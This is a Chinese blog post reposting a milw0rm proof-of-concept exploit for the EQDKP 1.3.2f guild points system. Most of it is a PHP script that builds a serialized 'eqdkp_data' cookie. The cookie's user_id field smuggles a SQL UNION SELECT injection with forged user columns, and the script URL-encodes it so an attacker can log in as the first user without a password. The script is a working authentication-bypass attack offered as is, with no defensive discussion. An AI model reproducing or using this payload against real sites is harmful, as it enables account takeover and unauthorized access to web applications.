EQDKP 1.3.2f (user_id) Authentication Bypass (PoC)

2008/05/14 2:28 | 鬼仔 |  技术文章 占个座先

<?php
// EQDKP 1.3.2f Authentication Bypass (PoC)
// vort.fu@gmail.com
$data['auto_login_id'] = 'x';
$data['user_id']       = "1' " .
"UNION SELECT " .
"1, " .         // * user_id
"'a', " .       // username
"'x', " .       // * user_password
"'', " .        // user_email
"1, " .         // user_alimit
"1, " .         // user_elimit
"1, " .         // user_ilimit
"1, " .         // user_nlimit
"1, " .         // user_rlimit
"1, " .         // user_style
"'english', " . // user_lang
"NULL, " .      // user_key
"1, " .         // user_lastvisit
"NULL, " .      // user_lastpage
"1, " .         // * user_active
"NULL, " .      // user_newpassword
"NULL " .       // session_current
"ORDER BY " .
"username ASC" .
"/*";

$cookie = serialize($data);
echo "eqdkp_data\n\n";

for($i = 0; $i < strlen($cookie); $i++)
echo '%' . bin2hex($cookie[$i]);

echo "\n\n";
?>

# milw0rm.com [2008-05-13]

Tags: ,
Del.icio.us Google书签 Digg Live Bookmark Technorati Furl Yahoo书签 Facebook 百度搜藏 新浪ViVi 365Key网摘 天极网摘 和讯网摘 博拉网 POCO网摘 添加到饭否 QQ书签 Digbuzz我挖网

相关日志

上一篇:中国红十字会总会救灾专用账号和热线
下一篇:Aviv Raff的IE0day,公布了

0排都被占了... 抢座 或者 Trackback

发表评论

正在发表,请稍后...

回到上面